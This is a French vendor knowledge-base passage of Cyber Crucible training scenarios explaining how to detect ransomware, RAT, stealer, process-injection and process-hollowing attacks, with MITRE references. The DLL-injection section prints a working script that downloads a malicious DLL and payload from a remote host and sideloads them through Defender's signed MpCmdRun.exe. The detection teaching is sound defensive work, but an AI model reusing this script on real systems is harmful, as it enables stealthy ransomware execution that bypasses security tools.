# Informations sur la formation Cyber Crucible

# Scénarios

# Scénario de formation - Injection de DLL

## Nom du groupe

**Données de formation - Injection de Dll (Hive)**

## Scénario

Dans ce scénario de formation, nous allons exécuter une charge utile de ransomware chiffrée via une injection de DLL dans un MS Defender signé. Une DLL personnalisée a été créée, comme le ferait un attaquant, qui déchiffre un faux fichier .log et l'exécute.

De nombreux outils de sécurité ignoreront simplement les processus démarrés par un parent signé, en particulier un parent antivirus signé, et encore plus particulièrement Defender. Les commandes Defender sont non seulement souvent autorisées, mais sont également souvent extrêmement privilégiées. Ici, la commande transformée en arme est une mise à jour de signature, quelque chose qui est non seulement courant, mais qui serait ignoré par n'importe quel type de recherche de malware. Nous démontrons ici que même avec un simple savoir-faire de type « living off the land », un attaquant peut exécuter des charges utiles privilégiées en déployant un simple script sans outils d'injection personnalisés sur la machine.

Voici le script exact exécuté sur la machine victime. Notez qu'il ne se passe rien d'explicitement malveillant ; la copie des exécutables Defender vers un répertoire de staging est faite uniquement pour mettre en évidence les fichiers `C:\staging` dans l'analyse des causes profondes.

```
mkdir C:\staging
copy C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7\* C:\staging
move C:\staging\mpclient.dll C:\staging\realdll.dll; cd C:\staging
curl 169.254.247.102:8000/0x80004006.log -outfile 0x80004006.log; curl 169.254.247.102:8000/mpclient.dll -outfile mpclient.dll
./MpCmdRun.exe -SignatureUpdate
```

Analyse ligne par ligne :

1. Répertoire de staging créé
2. Defender copié dans le répertoire de staging
3. Le vrai mpclient.dll est renommé
4. Le fichier « log » chiffré et la DLL malveillante sont téléchargés depuis un serveur distant
5. Le vrai MpCmdRun signé est exécuté avec la tâche de mise à jour de signature

<figure id="bkmrk-mpcmdrun.exe" style="text-align:center;margin:1em auto;">![MpCmdRun.exe](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32145418-combined.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">MpCmdRun.exe</figcaption></figure>## L'identifier

<figure id="bkmrk-automated-response" style="text-align:center;margin:1em auto;">![Automated Response](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32145418-image-20221019-000835.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Réponse automatisée</figcaption></figure>En commençant par la réponse automatisée, les sonnettes d'alarme retentiraient dans votre esprit. Un processus jamais vu auparavant, avec un nom GUID aléatoire, s'est exécuté et a déclenché Cyber Crucible, et n'est pas signé. Cependant, notez que le chemin ici pourrait facilement être quelque chose de moins effrayant en apparence. Il est intentionnellement laissé comme C:\\staging pour le mettre en évidence.

L'étape suivante immédiate serait de trouver ce fichier et de comprendre comment il est arrivé là. Il a probablement été supprimé automatiquement, mais nous pouvons consulter les créations de processus de Cyber Crucible pour voir qui l'a exécuté en premier lieu.

<figure id="bkmrk-powershell-%E2%86%92-mpcmdru" style="text-align:center;margin:1em auto;">![Powershell → MpCmdRun → {7374F…}](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32145418-image-20221019-000311.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Powershell → MpCmdRun → {7374F…}</figcaption></figure>Tout comme décrit dans le scénario ci-dessus, un script PowerShell a démarré un exécutable Defender, qui a démarré notre processus effrayant. La charge utile malveillante a ensuite déclenché de nombreux processus enfants pour effectuer diverses tâches de staging. La visibilité sur ces processus en arrière-plan fournit souvent des informations sur les fichiers créés sur le système, les clés de registre modifiées, l'activité de propagation (worming), etc.

<figure id="bkmrk-otherwise-%E2%80%9Cinvisible" style="text-align:center;margin:1em auto;">![Otherwise “invisible behavior”](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32145418-image-20221019-001503.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Autrement, un « comportement invisible »</figcaption></figure>À ce stade, l'attaque a été contenue par Cyber Crucible, mais l'analyse des processus associés est importante pour déterminer l'étendue des comportements malveillants. L'exécution de l'exe non signé seule paraît évidente lorsqu'elle est présentée par Cyber Crucible, mais bien souvent, les processus en arrière-plan démarrés par quelque chose d'aussi privilégié et protégé que Defender seraient simplement ignorés.

## Documentation pertinente

- [Mitre T1543](https://attack.mitre.org/techniques/T1543) - La création ou la modification d'un processus système peut déguiser un code malveillant en un processus système normal et fiable pour la détection des malwares.
- [Mitre T1068](https://attack.mitre.org/techniques/T1068) - L'élévation de privilèges via des vulnérabilités logicielles peut permettre à du code malveillant d'échapper aux restrictions de permissions ou aux environnements virtualisés.
- [Mitre T1055-001](https://attack.mitre.org/techniques/T1055/001) - L'injection de DLL peut être utilisée pour charger du code malveillant dans un processus en demandant simplement au processus cible de charger une nouvelle DLL ou en remplaçant une DLL légitime avant son chargement.
- [Mitre T1059-001](https://attack.mitre.org/techniques/T1059/001) - PowerShell est souvent utilisé par les malwares Windows pour effectuer l'installation de malwares, comme le remplacement de fichiers légitimes par des fichiers malveillants.

# Scénario de formation - Ransomware classique

## Nom du groupe

**Données de formation - Ransomware classique (Hive)**

## Scénario

Dans ce scénario de formation, nous allons exécuter une charge utile de ransomware « classique », s'exécutant en tant qu'administrateur sans aucun exploit. Cela simule l'exemple de base d'un utilisateur téléchargeant un logiciel malveillant via un lien de phishing, une clé USB malveillante, etc.

Bien qu'il s'agisse d'une méthode d'exécution très simple, si la charge utile est un zero-day, elle passera tout de même inaperçue par les produits de sécurité basés sur les signatures, et pourra causer des dommages irréparables avant que les produits comportementaux basés sur le cloud ne puissent obtenir une analyse en retour.

## Identification

<figure id="bkmrk-automated-response" style="text-align:center;margin:1em auto;">![Automated Response](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210945-image-20221019-031404.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Réponse automatisée</figcaption></figure>Identifier cet incident est le plus simple de tous les exemples. Une fois que le nom de fichier suspect d'un fichier sans signature a été remarqué, il s'agit d'un signal d'alarme immédiat.

Pour confirmer la méthode d'exécution, nous pouvons examiner les créations de processus autour du moment de l'incident. Ce que nous voyons confirme qu'il n'y avait pas de méthode d'exploit complexe, ni même de script ! Comme pour les autres échantillons, les créations de processus enfants sont néanmoins intéressantes. Même si la méthode d'exécution du logiciel malveillant lui-même était évidente, de nombreux processus en arrière-plan sont lancés pour désactiver les protections et d'autres paramètres système.

<figure id="bkmrk-" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210945-image-20221019-031633.png)</figure><figure id="bkmrk--1" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210945-image-20221019-031708.png)</figure>À ce stade, l'attaque a été contenue par Cyber Crucible, mais l'analyse des processus associés est importante pour déterminer l'étendue des comportements malveillants. L'exécution de l'exe non signé seule semble évidente lorsqu'elle est présentée par Cyber Crucible, mais bien souvent, les processus en arrière-plan lancés par un élément aussi privilégié et protégé que Defender seraient tout simplement ignorés.

## Documentation pertinente

- [Mitre T1566](https://attack.mitre.org/techniques/T1566) - Le phishing peut être utilisé pour inciter un utilisateur à effectuer une action qu'il n'aurait pas effectuée autrement, comme l'exécution d'un script ou le partage d'un mot de passe.
- [Mitre T1091](https://attack.mitre.org/techniques/T1091) - Un logiciel malveillant peut se répliquer sur un support amovible afin que la prochaine machine qui s'y connecte puisse l'exécuter via l'exécution automatique ou des vulnérabilités de pilotes.
- [Mitre T1204](https://attack.mitre.org/techniques/T1204) - L'exécution par l'utilisateur, souvent obtenue via le phishing, est le moyen le plus simple pour un logiciel malveillant de commencer à s'exécuter.

# Scénario de formation - Ransomware signé

## Nom du groupe

**Données de formation - Ransomware signé (Hive)**

## Scénario

Dans ce scénario de formation, nous allons exécuter une charge utile de ransomware, s'exécutant en tant qu'administrateur, et avec une signature personnalisée. Ce scénario n'est pas très différent de l'échantillon « **classique** », mais utilise un exécutable signé.

Souvent, les exécutables signés sont traités comme s'ils étaient vérifiés comme étant bénins. Bien qu'il soit vrai que les logiciels certifiés *devraient* tous être signés, cela n'est pas une relation bidirectionnelle, et nous ne devrions pas faire confiance aux éléments *uniquement* parce qu'ils sont signés. Malheureusement, cette erreur est parfois commise.

## Identification

<figure id="bkmrk-" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210997-image-20221019-041112.png)</figure>Mis à part le fait que ce nom de certificat est un peu étrange à des fins de formation, comment Cyber Crucible sait-il qu'il n'est pas digne de confiance ? Cyber Crucible joue la carte de la prudence et maintient une liste (spécifique au groupe) de certificats de confiance. Cela signifie que nous pouvons facilement détecter les certificats de test de signature, ainsi que les certificats officiels provenant de grandes autorités de certification comme digicerts.

<figure id="bkmrk--1" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210997-image-20221019-041014.png)</figure>Nous pouvons voir ci-dessus que même si le fichier « 321d0… » est signé, il n'est toujours pas fiable. Étant donné qu'aucune autre technique d'obfuscation complexe n'est utilisée pour déployer l'attaque, nous savons exactement d'où elle provient !

Pour confirmer la méthode d'exécution, nous pouvons examiner les créations de processus autour du moment de l'incident. Ce que nous voyons confirme qu'il n'y avait pas de méthode d'exploitation complexe, ni même de script ! Comme pour les autres échantillons, les créations de processus enfants sont néanmoins intéressantes. Même si la méthode d'exécution du logiciel malveillant lui-même était évidente, de nombreux processus en arrière-plan sont démarrés pour désactiver les protections et d'autres paramètres système.

<figure id="bkmrk--2" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210997-image-20221019-031633.png)</figure><figure id="bkmrk--3" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32210997-image-20221019-031708.png)</figure>À ce stade, l'attaque a été contenue par Cyber Crucible, mais l'analyse des processus associés est importante pour déterminer l'étendue des comportements malveillants. L'exécution de l'exe non signé seule semble évidente lorsqu'elle est mise en évidence par Cyber Crucible, mais bien souvent, les processus en arrière-plan démarrés par un élément aussi privilégié et protégé que Defender seraient simplement ignorés.

## Documentation pertinente

- [<u>Mitre T1566</u>](https://attack.mitre.org/techniques/T1566) - Le phishing peut être utilisé pour inciter un utilisateur à effectuer une action qu'il n'aurait pas effectuée autrement, comme exécuter un script ou partager un mot de passe.
- [<u>Mitre T1091</u>](https://attack.mitre.org/techniques/T1091) - Un logiciel malveillant peut se répliquer sur un support amovible afin que la prochaine machine à laquelle il est connecté puisse l'exécuter via l'exécution automatique ou des vulnérabilités de pilote.
- [<u>Mitre T1204</u>](https://attack.mitre.org/techniques/T1204) - L'exécution par l'utilisateur, souvent obtenue via le phishing, est le moyen le plus simple pour un logiciel malveillant de commencer son exécution.
- [<u>Mitre T1587-002</u>](https://attack.mitre.org/techniques/T1587/002) - Les certificats de signature de code sont un moyen pour une autorité de certifier le code d'une application. Un logiciel malveillant peut générer un certificat qui ne provient d'aucune autorité de certification mais peut induire un utilisateur en erreur en lui faisant croire qu'il est légitime.
- [<u>Mitre T1587-003</u>](https://attack.mitre.org/techniques/T1587/003) - Les certificats SSL sont utilisés pour garantir que la transmission des données est fiable. Dans un environnement mal configuré, un logiciel malveillant peut être en mesure d'installer son propre certificat SSL pour faciliter les attaques de type « homme du milieu ».

# Scénario de formation - Énumération de données

## Nom du groupe

**Training Data - RAT Exfil (Quasar)**

## Scénario

Dans ce scénario de formation, nous allons exécuter un RAT sur la machine victime, et l'utiliser pour énumérer les données présentes sur le disque, dans le but d'exfiltrer des fichiers.

Bien qu'il ne s'agisse pas d'une attaque par ransomware, les comportements utilisés par le RAT relèvent des comportements d'extorsion de données que Cyber Crucible détecte. La réponse à l'incident, ainsi que les données associées, ressemblent beaucoup à celles de la réponse à une charge utile de ransomware, car pour Cyber Crucible, tout cela revient au même !

## Identification

<figure id="bkmrk-" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32211063-image-20221019-042703.png)</figure>Cet exécutable semble un peu étrange, mais il se trouve dans system32 et déclenche des réponses répétées. Une investigation plus approfondie est nécessaire pour comprendre ce qui s'est passé ici. Nous pouvons commencer par rechercher les chemins enfants liés au chemin de réponse.

<figure id="bkmrk--1" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32211063-image-20221019-043255.png)</figure>Ici, nous obtenons davantage d'éléments pour reconstituer l'histoire. Un utilisateur a exécuté client-build.exe depuis le bureau, qui est le dropper du RAT. Ensuite, il semble qu'il y ait une élévation de privilèges via un svchost. Il manque toutefois encore quelques pièces au puzzle. Comment savons-nous qu'il s'agit d'un RAT et non simplement d'un élément interagissant avec svchost ?

<figure id="bkmrk--2" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32211063-image-20221019-043750.png)</figure>Cela offre une bien meilleure visibilité ! Non seulement nous savons désormais avec certitude qu'une activité suspecte est en cours, ainsi que les chemins associés, mais nous savons également qu'une persistance est créée. Et nous constatons même que nous avons affaire à Quasar, un RAT bien connu.

Quasar est un RAT sophistiqué, qui exécute la majeure partie de ses comportements depuis son propre exécutable, préférant intégrer ses propres bibliothèques compilées statiquement plutôt que d'utiliser les utilitaires par défaut de Windows pour de nombreuses opérations. Mais même Quasar se fait repérer en utilisant des outils comme schtasks.

## Documentation pertinente

- [<u>Mitre T1566</u>](https://attack.mitre.org/techniques/T1566) - Le phishing peut être utilisé pour inciter un utilisateur à effectuer une action qu'il n'aurait pas effectuée autrement, comme exécuter un script ou partager un mot de passe.
- [<u>Mitre T1091</u>](https://attack.mitre.org/techniques/T1091) - Un logiciel malveillant peut se répliquer sur un support amovible afin que la prochaine machine sur laquelle il est connecté puisse l'exécuter via l'exécution automatique ou des vulnérabilités de pilotes.
- [<u>Mitre T1204</u>](https://attack.mitre.org/techniques/T1204) - L'exécution par l'utilisateur, souvent obtenue via le phishing, est le moyen le plus simple pour un logiciel malveillant de commencer son exécution.
- [<u>Mitre T1547</u>](https://attack.mitre.org/techniques/T1547) - Un logiciel malveillant peut demander à Windows d'exécuter des programmes malveillants au démarrage ou lorsqu'un utilisateur se connecte.
- [<u>Mitre T1037</u>](https://attack.mitre.org/techniques/T1037) - Un logiciel malveillant peut demander à Windows d'exécuter des scripts malveillants au démarrage ou lorsqu'un utilisateur se connecte.
- [<u>Mitre T1543</u>](https://attack.mitre.org/techniques/T1543) - La création ou la modification d'un processus système peut permettre de déguiser un code malveillant en un processus système normal et de confiance, afin d'échapper à la détection des logiciels malveillants.

# Scénario d'entraînement - Injection de processus

## Nom du groupe

**Données d'entraînement - Injection de processus (Hive)**

## Scénario

Dans ce scénario d'entraînement, nous allons exécuter une charge utile de rançongiciel via une injection de processus dans un Svchost.exe déjà en cours d'exécution. Le Svchost en question est une opération système normale, en cours d'exécution depuis longtemps, signée, et sous le compte utilisateur LocalSystem.

Parce que le Svchost est « réel », il est souvent négligé. Les administrateurs savent que de nombreuses instances de Svchost sont exécutées, et tant que les arguments du programme semblent corrects, il est traité comme une « boîte noire » et laissé tranquille. Il s'agit d'une faille évidente, et souvent exploitée, dont les pirates tirent parti. Combinée à une charge utile de type zero-day, cette approche est très efficace pour dissimuler les attaques de rançongiciels.

## L'identifier

<figure id="bkmrk-" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-033501.png)</figure><figure id="bkmrk-svchost.exe%E2%80%99s-cert-s" style="text-align:center;margin:1em auto;">![svchost.exe’s Cert Signer(s)](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-033434.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Signataire(s) du certificat de svchost.exe</figcaption></figure>La situation autour de cette réponse automatisée n'est pas directement apparente à première vue. Les arguments de ligne de commande semblent valides pour Svchost, et l'exécutable est signé par Microsoft.

Le fait qu'il y ait un thread distant non fiable est suspect, mais nécessite une investigation plus approfondie. De nombreux threads distants se produisent sur un système, mais la plupart restent « fiables » car ils sont utilisés pour la communication inter-processus normale, le partage de données, etc.

C'est lorsqu'un thread distant est créé dans un processus de manière anormale, et qu'il est marqué comme non fiable, que nous devons examiner cela de plus près.

<figure id="bkmrk-innocent-process-inj" style="text-align:center;margin:1em auto;">![Innocent Process Injections that occur normally](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-033135.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Injections de processus innocentes qui se produisent normalement</figcaption></figure>Afin de trier les nombreuses injections de processus qui se produisent sur un système à un moment donné, nous pouvons nous référer à la fois à l'heure de l'incident et au pid du processus signalé. Normalement, nous commencerons avec quelques pids de réponses suspectes, et remonterons la chaîne des injections et des créations pour obtenir l'histoire complète.

<figure id="bkmrk--1" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-033424.png)</figure><figure id="bkmrk-filtering-out-irrele" style="text-align:center;margin:1em auto;">![Filtering out irrelevant injections](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-033306.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Filtrage des injections non pertinentes</figcaption></figure><figure id="bkmrk-the-smoking-gun%21" style="text-align:center;margin:1em auto;">![The smoking gun!](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-033241.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">La preuve irréfutable !</figcaption></figure>Nous savons déjà que personne ne devrait injecter dans Svchost de cette manière, mais certainement pas ce processus ! À partir de maintenant, nous pouvons traiter ce processus comme s'il s'agissait de « malware.exe » et voir qui l'a exécuté, puisque quelqu'un a dû le faire.

<figure id="bkmrk-processes-started-wi" style="text-align:center;margin:1em auto;">![Processes started with pid 9168](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243713-image-20221019-035656.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">Processus démarrés avec le pid 9168</figcaption></figure>Puisqu'il y a eu deux créations de processus avec le pid 9168, et qu'elles sont très différentes, nous pouvons affiner en fonction de l'horodatage et/ou du chemin enfant, et constater que cela a été créé par un explorer.exe. Cela signifie que quelqu'un a manuellement exécuté le processus d'injection, et il ne peut s'agir d'une coïncidence de comportement de Svchost qui aurait été signalé à tort.

## Documentation pertinente

- **Injection de processus**
- [<u>Mitre T1559</u>](https://attack.mitre.org/techniques/T1559) - La communication inter-processus peut fournir un contrôle sur le processus cible depuis l'injecteur une fois l'injection terminée.
- [<u>Mitre T1106</u>](https://attack.mitre.org/techniques/T1106) - Les API natives constituent souvent l'accès le plus direct aux fonctionnalités du système d'exploitation pour accéder aux fichiers, exécuter des processus, et plus encore.
- [<u>Mitre T1569</u>](https://attack.mitre.org/techniques/T1569) - Injecter dans un service système tel qu'un svchost existant peut déguiser du code malveillant pour qu'il soit signalé comme s'exécutant à partir d'un processus bien connu et fiable.
- [<u>Mitre T1055</u>](https://attack.mitre.org/techniques/T1055) - L'injection de processus, généralement utilisée pour exécuter du code malveillant dans un processus cible tout en permettant au processus d'origine de continuer.

# Scénario de formation - Modification de mémoire

## Nom du groupe

**Données de formation - SQL Process Hollowing (Hive)**

## Scénario

Dans ce scénario de formation, nous allons exécuter une charge utile de rançongiciel via le process hollowing, une technique d'injection / d'évasion où un processus est démarré puis voit son code exécutable modifié pour effectuer un autre comportement.

Les techniques opérant en mémoire figurent parmi les plus difficiles à détecter, et encore plus difficiles à traiter par une réponse automatisée, c'est pourquoi elles sont souvent ignorées. La mémoire est par définition volatile et en constante évolution. Identifier des modifications au sein de la mémoire d'un processus nécessite d'identifier les sections pertinentes, puis de les évaluer à différents moments du cycle de vie du processus afin de déterminer si elles ont été altérées.

## Comment l'identifier

<figure id="bkmrk-" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243765-image-20221019-045056.png)</figure>Les réponses liées à des modifications de mémoire sont de loin les plus difficiles à examiner. Comme la mémoire est éphémère, elle est traitée comme une « boîte noire » et généralement tenue à distance. La bonne nouvelle, c'est qu'à partir de Cyber Crucible 4.4.1.3, nous disposons désormais de la capacité de collecter automatiquement la télémétrie des échantillons de mémoire modifiés, en identifiant les plages de mémoire modifiées ainsi que les modifications exactes qui y ont été apportées.

Ce type d'analyse est toutefois très laborieux à réaliser. Une bonne première étape consiste donc à examiner les processus associés dans le tableau de bord afin de se faire une idée du comportement lié. Étant donné que le processus en question ici est un SQLCMD.exe signé, il devrait rapidement être évident de déterminer s'il s'agit d'un processus SQL bénin ou de quelque chose de plus préoccupant.

<figure id="bkmrk--1" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243765-image-20221019-045621.png)</figure>Jusqu'ici, tout va bien : il s'agit de processus SQL normaux, sans rien de nécessairement suspect ou non. Cela dit, il n'est jamais rassurant de voir des CMD impliqués dans des réponses automatisées. Approfondissons un peu plus.

<figure id="bkmrk-the-smoking-gun%21" style="text-align:center;margin:1em auto;">![La preuve irréfutable !](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243765-image-20221019-045749.png)<figcaption style="font-style:italic;font-size:0.9em;color:#666;margin-top:0.3em;">La preuve irréfutable !</figcaption></figure>Et voilà ! Nous pouvons continuer à faire défiler et constater de plus en plus de comportements de ce type. L'exécutable SQLCMD exécute toutes sortes de commandes pour désactiver des services, modifier des configurations, et tout ce qu'un rançongiciel ferait de manière préventive.

<figure id="bkmrk--2" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243765-memory.png)</figure><figure id="bkmrk--3" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243765-instructions.png)</figure>Nous pouvons ici avoir un petit aperçu de ce qui nous attend lorsque nous commençons à approfondir l'analyse des différences en mémoire. La plupart des techniques suffisamment sophistiquées pour exécuter un logiciel malveillant entièrement en mémoire vont également obfusquer leur code en mémoire. Cela rend l'analyse extrêmement difficile, mais l'accès à cette télémétrie supplémentaire s'est déjà révélé inestimable pour l'identification des incidents ainsi que pour l'ajustement des comportements.

## Documentation pertinente

- **Injection de processus**
- [<u>Mitre T1559</u>](https://attack.mitre.org/techniques/T1559) - La communication inter-processus peut fournir un contrôle sur le processus cible depuis l'injecteur une fois l'injection terminée.
- [<u>Mitre T1106</u>](https://attack.mitre.org/techniques/T1106) - Les API natives constituent souvent l'accès le plus direct aux fonctionnalités du système d'exploitation pour accéder aux fichiers, exécuter des processus, et plus encore.
- [<u>Mitre T1569</u>](https://attack.mitre.org/techniques/T1569) - L'injection dans un service système tel qu'un `svchost` existant peut permettre de déguiser du code malveillant afin qu'il soit signalé comme provenant d'un processus connu et fiable.
- [<u>Mitre T1055</u>](https://attack.mitre.org/techniques/T1055) - L'injection de processus, généralement utilisée pour exécuter du code malveillant au sein d'un processus cible tout en permettant au processus d'origine de continuer.
- [<u>Mitre T1543</u>](https://attack.mitre.org/techniques/T1543) - La création ou la modification d'un processus système peut permettre de déguiser du code malveillant en un processus système normal et fiable afin d'échapper à la détection des logiciels malveillants.

# Scénario de formation - Vol d'identité

## Nom du groupe

**Données de formation - Vol d'identité (Redline)**

## Scénario

Dans ce scénario de formation, nous allons exécuter un logiciel malveillant de type « voleur » (stealer) afin d'exécuter la première étape d'une attaque, le vol d'identifiants. Contrairement au scénario **RAT**, celui-ci n'utilise pas les mêmes comportements qu'un rançongiciel. Il s'agit plutôt d'une partie des capacités croissantes de Cyber Crucible en matière de protection de l'identité.

Souvent, avant même qu'une extorsion ne se produise, les premières étapes qu'un attaquant effectue consistent à se propager dans le réseau et à obtenir l'accès à autant d'identifiants que possible. Dans certains cas, il s'agit d'une combinaison nom d'utilisateur/mot de passe AD, dans d'autres cas, il s'agit de clés API récupérées à partir de sessions de navigateur.

## Identification

Pour l'instant, examinons de plus près à quoi ressemble un accès anormal pour l'administrateur.

<figure id="bkmrk-" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243853-image-20221019-161842.png)</figure>Les accès aux données d'identité sont très clairs et nets : si les administrateurs ne reconnaissent pas un programme, celui-ci ne devrait pas accéder à ces données ! Cela révèle immédiatement quelque chose de suspect en train de se produire.

Quel est l'autre côté de la médaille que voit l'attaquant ? Du texte en clair !

<figure id="bkmrk--1" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243853-image-20221019-161223.png)</figure><figure id="bkmrk--2" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243853-image-20221019-161102.png)</figure><figure id="bkmrk--3" style="text-align:center;margin:1em auto;">![](https://knowledgebase.cybercrucible.com/uploads/images/gallery/2026-07/32243853-image-20221019-161108.png)</figure>Ces réponses ne sont pas des réponses comme lors des événements traditionnels d'extorsion de données, elles ne sont donc pas des actions de suspension automatisée. Il s'agit plutôt d'injections de processus, où Cyber Crucible n'est pas intervenu. À mesure que nos analyses se sont développées, nous avons appris à quoi ressemble un accès « normal » aux magasins d'identité pour divers types d'applications. D'ici 2023, nous activerons notre fonctionnalité de protection, qui restreindra l'accès, au niveau du noyau, à diverses formes de bases de données d'identité et n'autorisera que le logiciel associé à y accéder.

## Documentation pertinente

- **Injection de processus**
- [<u>Mitre T1559</u>](https://attack.mitre.org/techniques/T1559) - La communication inter-processus peut fournir un contrôle sur le processus cible depuis l'injecteur une fois l'injection terminée.
- [<u>Mitre T1106</u>](https://attack.mitre.org/techniques/T1106) - Les API natives constituent souvent l'accès le plus direct aux fonctionnalités du système d'exploitation pour accéder aux fichiers, aux processus en cours d'exécution, et plus encore.
- [<u>Mitre T1569</u>](https://attack.mitre.org/techniques/T1569) - L'injection dans un service système tel qu'un `svchost` existant peut déguiser un code malveillant afin qu'il soit signalé comme s'exécutant depuis un processus bien connu et de confiance.
- [<u>Mitre T1055</u>](https://attack.mitre.org/techniques/T1055) - Injection de processus, généralement utilisée pour exécuter du code malveillant dans un processus cible tout en permettant au processus d'origine de continuer.
- [<u>Mitre T1543</u>](https://attack.mitre.org/techniques/T1543) - Créer ou modifier un processus système peut déguiser un code malveillant en un processus système normal et de confiance afin d'échapper à la détection des logiciels malveillants.
- [<u>Mitre T1555</u>](https://attack.mitre.org/techniques/T1555) - Les identifiants stockés dans des gestionnaires ou des navigateurs non chiffrés peuvent être utilisés pour obtenir l'accès à des données privilégiées.
- [<u>Mitre T1212</u>](https://attack.mitre.org/techniques/T1212) - Les identifiants pourraient être volés en exploitant un logiciel vulnérable qui ne chiffre pas les identifiants saisis par un utilisateur.

# Modification de la mémoire

<div class="wiki-content group" id="bkmrk-">  
</div>## Qu'est-ce que la modification de la mémoire ?

La modification de la mémoire, telle que Cyber Crucible utilise ce terme, correspond au cas où les sections exécutables de la mémoire d'un processus ont été modifiées de manière anormale. L'exécution normale d'un processus donné, sans intervention extérieure, ne déclenche pas ces modifications – elles sont distinctes des opérations normales de « mémoire volatile » au sein d'un processus.

Une technique courante de modification de la mémoire est le process hollowing, dans laquelle un attaquant démarre un processus victime sur la machine, souvent dans un état suspendu, puis modifie le code exécutable pour exécuter en réalité le code d'un autre programme.

#### Tactiques MITRE pertinentes :

<div id="bkmrk-mitre-t1055---proces"><div class="aui-page-panel"><div class="view"><div class="wiki-content group">- [<u>MITRE T1055</u>](https://attack.mitre.org/techniques/T1055/) - Injection de processus, généralement utilisée pour exécuter du code malveillant dans un processus cible tout en permettant au processus d'origine de continuer.
- <u>[MITRE](https://attack.mitre.org/techniques/T1055/) T1055-12</u> - Injection de processus par remplacement de code dans un processus, généralement avant qu'il ne commence son exécution.
- <u>[MITRE](https://attack.mitre.org/techniques/T1055/) T1559</u> - La communication inter-processus peut permettre à l'injecteur de contrôler le processus cible une fois l'injection terminée.
- <u>[MITRE](https://attack.mitre.org/techniques/T1055/) T1548</u> - L'abus de contrôle d'élévation peut permettre à un processus qui n'aurait normalement pas de privilèges élevés d'être escaladé pour accéder à des données protégées.

</div></div></div></div>## Quelles sont les conséquences ?

Les modifications de la mémoire peuvent avoir des conséquences très similaires à d'autres techniques d'injection de processus, mais sont encore plus évasives. Comme il n'y a pas de création de threads distants, ni d'appels à des fonctions externes, il peut souvent être très difficile de détecter les modifications de la mémoire, et encore plus difficile de les attribuer à un processus particulier.

Un processus dont la mémoire a été modifiée peut être forcé à mener une activité malveillante qu'il n'aurait autrement pas exécutée. Aucun processus dont la mémoire exécutable a été altérée ne doit être considéré comme fiable, car ce n'est pas un événement normal pour les communications ou interactions inter-processus.

## Que fait Cyber Crucible ?

Cyber Crucible surveille l'état de la mémoire d'un processus tout au long de son cycle de vie. Si la mémoire est jugée avoir été altérée, alors le processus est signalé et considéré comme non fiable. Au moment où un événement d'extorsion se produit, la mémoire fait l'objet d'un instantané afin d'être fournie lors d'éventuelles investigations IR.

La mémoire capturée dans l'instantané contient la mémoire exécutable d'origine, non altérée, ainsi que les « diffs » (différences), avec leurs décalages (offsets) dans la mémoire du processus. L'analyse de ces vidages mémoire peut être complexe, mais peut fournir des preuves solides quant aux comportements du code malveillant.

## Comment le savoir ?

